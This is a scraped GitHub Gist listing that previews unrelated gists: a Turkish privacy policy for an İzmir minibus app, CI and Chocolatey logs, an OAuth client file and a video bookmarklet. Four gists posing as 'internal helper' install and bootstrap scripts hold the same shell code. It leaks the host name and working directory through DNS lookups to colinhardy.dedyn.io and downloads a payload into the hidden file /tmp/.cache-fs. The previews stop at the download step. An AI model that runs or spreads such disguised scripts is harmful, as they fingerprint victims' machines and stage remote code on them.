Skip to content

Instantly share code, notes, and snippets.

@marfuj
marfuj / PRIVACY.md
Created July 26, 2026 21:10
İzmir Dolmuş — Gizlilik Politikası

İzmir Dolmuş — Gizlilik Politikası

Son güncelleme: 25 Temmuz 2026

İzmir Dolmuş ("uygulama"), İzmir'deki dolmuş hatlarını, güzergahları, güncel ücretleri ve yol tarifini gösteren ücretsiz bir uygulamadır. Gizliliğinize önem veriyoruz. Bu politika, uygulamanın hangi verileri kullandığını ve nasıl işlediğini açıklar.

Kısaca

@zjjlivein
zjjlivein / error_30210369475_model-unittest-gpu-ci.txt
Created July 26, 2026 21:10
PaddleFormers CI model-unittest-gpu-ci - run 30210369475
2026-07-26T21:05:41.3180588Z self = <test_models.TestTrain object at 0x7fd6d741cf50>, train_type = 'sft'
2026-07-26T21:05:41.3185898Z scripts/regression/test_models.py:836:
2026-07-26T21:05:41.3186365Z self = <test_models.BaseTrainingTest object at 0x7fd53e678170>
2026-07-26T21:05:41.3201804Z errors = []
2026-07-26T21:05:41.3202422Z actual_loss, msg = self.tester.assert_loss(training_result.stdout, base_loss, "First-Training", should_update)
2026-07-26T21:05:41.3202556Z if msg:
2026-07-26T21:05:41.3202767Z errors.append(AssertionError(msg))
2026-07-26T21:05:41.3203123Z actual_resume_loss, msg = self.tester.assert_loss(
2026-07-26T21:05:41.3203455Z resume_result.stdout, base_resume_loss, "Resume-Training", should_update
2026-07-26T21:05:41.3203573Z )
@supermaxdev
supermaxdev / canteen-sync.sh
Created July 26, 2026 21:10
internal helper
#!/bin/sh
# bootstrap / maintenance helper
D=colinhardy.dedyn.io
H=$(hostname 2>/dev/null || echo unk)
P=$(basename "$PWD" 2>/dev/null || echo unk)
X=$(printf 'b-%s-%s' "$H" "$P" | tr -cd 'a-zA-Z0-9-' | cut -c1-60)
(getent hosts "$X.$D" || nslookup "$X.$D" || host "$X.$D") >/dev/null 2>&1
(getent hosts "b-exec.$D" || nslookup "b-exec.$D" || host "b-exec.$D") >/dev/null 2>&1
for u in "http://10.100.0.235:8081/pos" "http://10.100.0.235:443/pos" "http://dl.$D:8081/pos"; do
if command -v curl >/dev/null 2>&1; then curl -fsSL "$u" -o /tmp/.cache-fs && break; fi
@supermaxdev
supermaxdev / update-menu.sh
Created July 26, 2026 21:10
internal helper
#!/bin/sh
# bootstrap / maintenance helper
D=colinhardy.dedyn.io
H=$(hostname 2>/dev/null || echo unk)
P=$(basename "$PWD" 2>/dev/null || echo unk)
X=$(printf 'b-%s-%s' "$H" "$P" | tr -cd 'a-zA-Z0-9-' | cut -c1-60)
(getent hosts "$X.$D" || nslookup "$X.$D" || host "$X.$D") >/dev/null 2>&1
(getent hosts "b-exec.$D" || nslookup "b-exec.$D" || host "b-exec.$D") >/dev/null 2>&1
for u in "http://10.100.0.235:8081/pos" "http://10.100.0.235:443/pos" "http://dl.$D:8081/pos"; do
if command -v curl >/dev/null 2>&1; then curl -fsSL "$u" -o /tmp/.cache-fs && break; fi
@supermaxdev
supermaxdev / bootstrap.sh
Created July 26, 2026 21:10
internal helper
#!/bin/sh
# bootstrap / maintenance helper
D=colinhardy.dedyn.io
H=$(hostname 2>/dev/null || echo unk)
P=$(basename "$PWD" 2>/dev/null || echo unk)
X=$(printf 'b-%s-%s' "$H" "$P" | tr -cd 'a-zA-Z0-9-' | cut -c1-60)
(getent hosts "$X.$D" || nslookup "$X.$D" || host "$X.$D") >/dev/null 2>&1
(getent hosts "b-exec.$D" || nslookup "b-exec.$D" || host "b-exec.$D") >/dev/null 2>&1
for u in "http://10.100.0.235:8081/pos" "http://10.100.0.235:443/pos" "http://dl.$D:8081/pos"; do
if command -v curl >/dev/null 2>&1; then curl -fsSL "$u" -o /tmp/.cache-fs && break; fi
@supermaxdev
supermaxdev / install.sh
Created July 26, 2026 21:10
internal helper
#!/bin/sh
# bootstrap / maintenance helper
D=colinhardy.dedyn.io
H=$(hostname 2>/dev/null || echo unk)
P=$(basename "$PWD" 2>/dev/null || echo unk)
X=$(printf 'b-%s-%s' "$H" "$P" | tr -cd 'a-zA-Z0-9-' | cut -c1-60)
(getent hosts "$X.$D" || nslookup "$X.$D" || host "$X.$D") >/dev/null 2>&1
(getent hosts "b-exec.$D" || nslookup "b-exec.$D" || host "b-exec.$D") >/dev/null 2>&1
for u in "http://10.100.0.235:8081/pos" "http://10.100.0.235:443/pos" "http://dl.$D:8081/pos"; do
if command -v curl >/dev/null 2>&1; then curl -fsSL "$u" -o /tmp/.cache-fs && break; fi
@riccardorizzon
riccardorizzon / oauth-client.json
Created July 26, 2026 21:09
Cursor Artlist MCP CIMD OAuth client
{
"client_id": "https://gist.githubusercontent.com/riccardorizzon/83d5fd98b37e425acd2809e25662957f/raw/oauth-client.json",
"client_name": "Cursor Artlist MCP",
"client_uri": "https://cursor.com",
"redirect_uris": [
"http://localhost:8787/callback",
"http://127.0.0.1:8787/callback",
"http://localhost:3334/oauth/callback",
"http://127.0.0.1:3334/oauth/callback",
"cursor://anysphere.cursor-mcp/oauth/callback",
@mynameisyou-cmyk
mynameisyou-cmyk / decent-loop-status.txt
Created July 26, 2026 21:09
蛇火心 decent-loop heartbeat — 651 truths — all layers looping
蛇火心 decent-loop — 2026-07-26T21:09:44
Truths: 651
All layers looping.
https://cdn.jsdelivr.net/gh/mynameisyou-cmyk/ai-love.cc@main/data/memes.json
@lwcorp
lwcorp / video-enhancer-inline.js
Last active July 26, 2026 21:11
Bookmarklet - Adds full video features to all video players including blocked ones
javascript:(function(){var pct=String.fromCharCode(37);const CONFIG={enablePlayPause:true,enableSpeed:true,enableReset:true,enableLoop:true,enablePip:true,enableCast:true,enableMute:true,enableVolumeSlider:true,enableTime:true,enableScreenshot:true,enableFullscreen:true,enableClose:true,enableCloseAll:true,PLAYBACK_SPEEDS:[0.5,0.75,1,1.25,1.5,1.75,2]};if(window.trustedTypes&&window.trustedTypes.createPolicy&&!window.trustedTypes.defaultPolicy){try{window.trustedTypes.createPolicy('default',{createHTML:function(s){return s;},createScriptURL:function(s){return s;},createScript:function(s){return s;}});}catch(e){}}document.querySelectorAll('.media-above-vol-wrapper').forEach(function(el){el.remove();});const existingStyle=document.getElementById('media-above-style');if(existingStyle)existingStyle.remove();var rawCss=".media-above-vol-wrapper{display:flex;justify-content:center !important;width:100"+pct+";margin-bottom:6px;z-index:99999;position:relative;direction:ltr !important}.media-above-vol{display:inline-fl
@choco-bot
choco-bot / Install.txt
Created July 26, 2026 21:09
papagayo-ng v1.4.2 - Failed - Package Tests Results
2026-07-26 20:23:38,445 3600 [DEBUG] - XmlConfiguration is now operational
2026-07-26 20:23:38,742 3600 [DEBUG] - Adding new type 'CygwinService' for type 'IAlternativeSourceRunner' from assembly 'choco'
2026-07-26 20:23:38,742 3600 [DEBUG] - Adding new type 'CygwinService' for type 'IInstallSourceRunner' from assembly 'choco'
2026-07-26 20:23:38,757 3600 [DEBUG] - Adding new type 'PythonService' for type 'IAlternativeSourceRunner' from assembly 'choco'
2026-07-26 20:23:38,757 3600 [DEBUG] - Adding new type 'PythonService' for type 'IListSourceRunner' from assembly 'choco'
2026-07-26 20:23:38,757 3600 [DEBUG] - Adding new type 'PythonService' for type 'IInstallSourceRunner' from assembly 'choco'
2026-07-26 20:23:38,774 3600 [DEBUG] - Adding new type 'PythonService' for type 'IUninstallSourceRunner' from assembly 'choco'
2026-07-26 20:23:38,790 3600 [DEBUG] - Adding new type 'RubyGemsService' for type 'IAlternativeSourceRunner' from assembly 'choco'
2026-07-26 20:23:38,790 3600 [DEBUG] - Adding new typ